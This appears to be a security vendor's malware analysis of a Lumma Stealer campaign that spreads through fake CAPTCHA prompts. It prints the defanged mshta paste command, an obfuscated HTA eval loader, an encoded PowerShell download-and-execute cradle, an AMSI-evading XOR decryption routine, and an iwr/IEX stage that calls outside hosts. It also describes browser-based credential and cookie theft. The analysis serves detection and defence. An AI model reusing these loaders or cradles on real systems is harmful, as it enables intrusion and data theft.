Caught in the CAPTCHAct: The Technical Tale of Lumma Stealer

On the 6th of January 2025, SenseOn flagged a high-priority case within one of our customer platforms. The case identified suspicious activity originating from the 'mshta.exe' process, further investigation revealed the process had attempted to connect to a domain widely recognised by threat intelligence as malicious.

As detailed in our previous post, SenseOn has observed a new strain of Lumma Stealer leveraging fake CAPTCHA verifications, hosted on compromised websites, as an initial access tactic. In the example discussed here, the user interacted with the compromised domain 'guest-incentive[.]fr'.

Following the on-screen steps, the "verification" process required us to paste and execute clipboard contents into the Run dialog (Windows Key + R). While the prompt appeared to execute the benign string '✅"I am not a robot - reCAPTCHA Verification ID: 6895”', the actual command was as follows:

mshta hxxps[:]//check.qlkwr[.]com/awjsx.captcha?u=b8be078a-a242-43ab-bd8c-674bb96c0017 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 6895''

Executing this command caused 'mshta.exe' to retrieve and run a file hosted on the external domain 'check.qlkwr[.]com'. This suspicious activity was immediately flagged by the SenseOn platform:

Visiting this domain through a browser redirects to 'klipderiq[.]shop', this was hosting an MP4 media file named 'kongo.mp4'.

In the customer environment, their corporate proxy successfully blocked connections to the domains 'qlkwr[.]com' and 'klipderiq[.]shop', preventing any interaction with the malicious sites. However, in our sandbox environment, we observed that 'mshta.exe' established a successful connection to the suspicious domain 'klipderiq[.]shop'.

A total of 2.5 MiB of data had been downloaded in this connection, likely downloading the MP4 file to the device.

All network connections observed by the 'mshta.exe' instance can be seen below:

Payload Delivery

Obfuscated ActiveX Behaviour

Analysing the contents of the 'kongo.mp4' file suggested hidden HTA code was present. Extracting several '<script>' tags revealed heavily obfuscated code. The following commands were significant and likely executed in our sandbox:

<script>window.moveTo(9999,0)</script>
<script>window.onerror = function(){return true}</script>
<script>var aETpr = document.documentElement.outerHTML;</script>
<script>var ZkChg = aETpr.substring(27 , 28260);</script>
<script>eval(ZkChg.replace(/(..)./g, function(match, p1) {return String.fromCharCode(parseInt(p1, 16))}))</script>

This HTA script, upon execution, moves the window off-screen and suppresses any further errors generated by the script. It then collects a string from the MP4 file and decodes the contents from hex. The hex values are separated by random character delimiters, for example '48d' would be hex value '48' decoding to the letter 'H'.

Decoding this to a more readable format gives us the below JavaScript snippet which uses the wscript ActiveX object to execute 'cmd.exe', this ran an encoded powershell command:

new ActiveXObject(WScript.Shell).Run("cmd.exe /c start powershell -w 1 -Enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAtAHcAIgAsACIAaABpAGQAZABlAG4AIgAsACIALQBlAHAAIgAsACIAYgB5AHAAYQBzAHMAIgAsACIALQBuAG8AcAAiACwAIgAtAEMAbwBtAG0AYQBuAGQAIgAsACIAJgAgAHsAJwAyAEwAVAAnAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewBTAEkAIABWAGEAcgBpAGEAYgBsAGUAOgAyAEwAVAAgACgAWwBQAG8AdwBlAHIAUwBoAGUAbABsAF0AOgA6AEMAcgBlAGEAdABlACgAKQApADsAIABbAFYAbwBpAGQAXQAoAEcAZQB0AC0ASQB0AGUAbQAgAFYAYQByAGkAYQBiAGwAZQA6AFwAMgBMAFQAKQAuAFYAYQBsAHUAZQAuAEEAZABkAFMAYwByAGkAcAB0ACgAKAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0AOgA6AE4AZQB3ACgAKQAuACgAKAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0AOgA6AE4AZQB3ACgAKQB8AEcAZQB0AC0ATQBlAG0AYgBlAHIAKQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAF8AIAAtAFYAYQBsAHUAZQApAC4ATgBhAG0AZQAgAC0AaQBsAGkAawBlACAAJwAqAHcAbgAqAGQAKgBnACcAfQApAC4ATgBhAG0AZQApACgAJwBoAHQAdABwAHMAOgAvAC8AeABpAGEAbgAuAGsAbABpAHAAZABlAHIAaQBxAC4AcwBoAG8AcAAvAGsAbwBuAGcAbwAuAGQAYgAnACkAKQApACkAOwAgACgARwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoAXAAyAEwAVAApAC4AVgBhAGwAdQBlAC4ASQBuAHYAbwBrAGUAKAApADsAIAAoAEcAZQB0AC0ASQB0AGUAbQAgAFYAYQByAGkAYQBiAGwAZQA6AFwAMgBMAFQAKQAuAFYAYQBsAHUAZQAuAEQAaQBzAHAAbwBzAGUAKAApAH0AfQAiAA", 0, true)

The encoded command can be seen in our telemetry, SenseOn verified the customer never reached this stage of infection:

The execution of 'powershell.exe', by 'mshta.exe', triggered an additional observation correlating into our SenseOn case:

Encoded Powershell Execution

The encoded powershell executed by the wscript ActiveX object decodes to the following:

Sleep 20;
Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ArgumentList "-w","hidden","-ep","bypass","-nop","-Command","& {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create());
 [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('hxxps[:]//xian.klipderiq[.]shop/kongo.db'))));
 (Get-Item Variable:\2LT).Value.Invoke();
 (Get-Item Variable:\2LT).Value.Dispose()}}"

The PowerShell command above initiates a 20-second delay before attempting to retrieve the contents of a file named 'kongo.db' from the domain 'xian.klipderiq[.]shop'. This connection triggered an additional observation in the SenseOn case:

Second Stage

The downloaded 'kongo.db' file contains over 22,000 lines of heavily obfuscated PowerShell code. We have extracted and highlighted the key lines that would have been executed on the compromised device:

function fdsjnh {
   $array_var = New-Object sYsTEm.CoLLectiONS.arRAyLISt;
   FOR ($i = 0; $i -le $charcode.Length-1; $i++) {
      $array_var.Add([char]$charcode[$i]) | Out-Null
   };
   $z = $array_var -join "";
   $Enc = [SYStEM.TEXt.ENcODinG]::UTF8;
   $XoRKEy = $Enc.GetBytes("AMSI_RESULT_NOT_DETECTED");
   $strinG = $Enc.GetString([systEm.coNVerT]::FromBase64String($z));
   $byteSTriNG = $Enc.GetBytes($strinG);
   $xoRdData = $(for ($i = 0;$i -lt $byteSTriNG.length;) {
      for ($j = 0; $j -lt $XoRKEy.length; $j++) {
         $byteSTriNG[$i] -bxor $XoRKEy[$j];
         $i++;
         if ($i -ge $byteSTriNG.Length) {$j = $XoRKEy.length}
         }
      });
   $xoRdData = $Enc.GetString($xoRdData);
   return $xoRdData
}

The function above performs XOR decryption on a large string of character codes, using 'AMSI_RESULT_NOT_DETECTED' as the decryption key. This key is notably associated with a result from a Microsoft Defender malware scan, indicating that the encoded script is likely designed to confirm it is not being intercepted or blocked by Defender's protections.

Process Injection

The script extracted during the XOR decryption scans the memory within the current process to identify regions associated with the Microsoft Antimalware Scan Interface (AMSI). Once found, the script attempts to overwrite the memory location by passing in a base64 malicious payload, this likely prevents AMSI from detecting the malicious behaviour.

This activity raised a further observation due to suspicious powershell keywords being detected in our telemetry:

Decoding the base64 script returns an executable named 'Gbegyjpm.exe'. The hash of this program was 'af86b32a933800cf30edb4f8f40cddd74253f599eb3edc8aa643fdfd30621f0b' and threat intelligence sources confirm this to be associated with Lumma Stealer.

In our sandbox environment, this suspicious executable appeared to have been injected into powershell. This led to 'msedge.exe' to spawn with the arguments '--remote-debugging-port=9222' causing an additional observation to raise in our SenseOn case:

Opening 'msedge.exe' with the arguments '--remote-debugging-port=9222' allows access to the browser's DevTools. From here, the threat actor is able to steal sensitive data including; cookies, saved credentials, autofill information, and browsing history.

C2 Connections

After the process injection was observed, connections to the domains 'carveforutune[.]click', 'cegu[.]shop' and 'klipvumisui[.]shop' had been identified:

Threat intelligence indicates that these connections were likely targeting the following URLs:

• GET - hxxps[:]//cegu[.]shop/8574262446/ph.txt
• GET - hxxps[:]//klipvumisui[.]shop/int_clp_sha.txt
• POST - hxxps[:]//carveforutune[.]click/api

Visiting the 'cegu[.]shop' URL returns a powershell script which would have likely been executed on the device:

[Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='hxxps[:]//dfgh[.]online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;

This script looks to further obtain data from 'dfgh[.]online', this was down at the time of our investigation. The domain 'klipvumisui[.]shop' was also down at the time of our investigation however threat intelligence suggests a file named 'int_clp_sha.txt', with the hash '16e037d7b5f6a8e02b73671e1214b7979eb5d0ab0fc1106cf4c321f0ff53e13a', would have likely been downloaded.

Performing further analysis into 'carveforutune[.]click', using threat intelligence, suggests that connections to this domain contained the data exfiltration.

Additional Samples

SenseOn has obtained a range of Lumma Stealer malware samples distributed from the domain 'check.qlkwr[.]com', each sample follows a very similar loader and contains very similar C2 connections.

Reviewing the connections in more depth we can see numerous attempts to connect to '[.]shop' domains, likely finding an active C2.

As a fallback to the [.]shop domains failing, the malware appears to then try and contact a Steam profile. This profile contains very unusual usernames and has been associated with other unusual usernames in the past:

In our latest sample, LummaStealer appears to be beaconing to the domain 'testylaughge[.]top'. We observe an initial POST request made to the '/api' URI, where the device's public IP address was transmitted in the request body. Shortly after, a large volume of data was exfiltrated via zip files, which, when decompressed, revealed the following:

1. First connection:
   1. 'Debug.txt' - Output of the Microsoft Edge remote debugging
2. Second connection:
   1. 'BrowserVersion.txt' - Current installed Microsoft Edge version
   2. 'Default' - A folder containing sensitive information extracted from Edge:
      1. 'Dev.txt' - Data exported from remote debugging, primarily containing cookies
      2. 'history' - SQLite database file detailing the user’s browsing history
      3. 'Login data' - SQLite database file detailing login activity and stored credentials
      4. 'Web data' - SQLite database file containing browsing activity details
3. Third connection:
   1. 'Processes.txt' - A list of all running processes on the device
   2. 'Software.txt' - A list of installed software on the device
4. Fourth connection:
   1. 'Clipboard.txt' - The current clipboard contents at the time of exfiltration
   2. 'Screen.png' - A screenshot of the current desktop, including visible open applications
   3. 'System.txt' - Contains high level information about the system.
      1. Antivirus and system specifications: CPU, RAM, GPU details
      2. Device and account details: Hostname, username, domain information.
      3. Lumma-specific information:
         1. Telegram accounts linked to stolen data marketplaces:
            1. 'lummanowork'
            2. 'lummamarketplace_bot'
         2. LummaC2 Build version - 'Jan 15 2025'
         3. Configuration file path 'C:\ProgramData\golbus\mechom.exe'

Conclusion

Lumma Stealer shows how malware is getting more and more advanced, and how attackers are coming up with new ways to get around traditional defenses. From fake CAPTCHA prompts and obfuscated scripts to process injection and extensive data exfiltration, this malware demonstrates a highly adaptive and methodical approach to compromising systems.

Through detailed sandbox analysis and telemetry correlation in the SenseOn platform, we were able to dissect each stage of the attack chain. SenseOn's detection capabilities flagged all suspicious behaviour, ensuring our customers remained protected from this malware.

As threat actors continue to refine their methods, it is crucial for organisations to stay vigilant and adopt proactive measures, such as blocking suspicious executables like 'mshta.exe' and disabling unnecessary tools such as the Run dialog. By leveraging advanced detection platforms like SenseOn, businesses can stay one step ahead of these threats and ensure their environments remain secure.

While Lumma Stealer represents a dangerous and evolving threat, thorough investigation and proactive defense strategies demonstrate that such campaigns can be mitigated effectively.

IoCs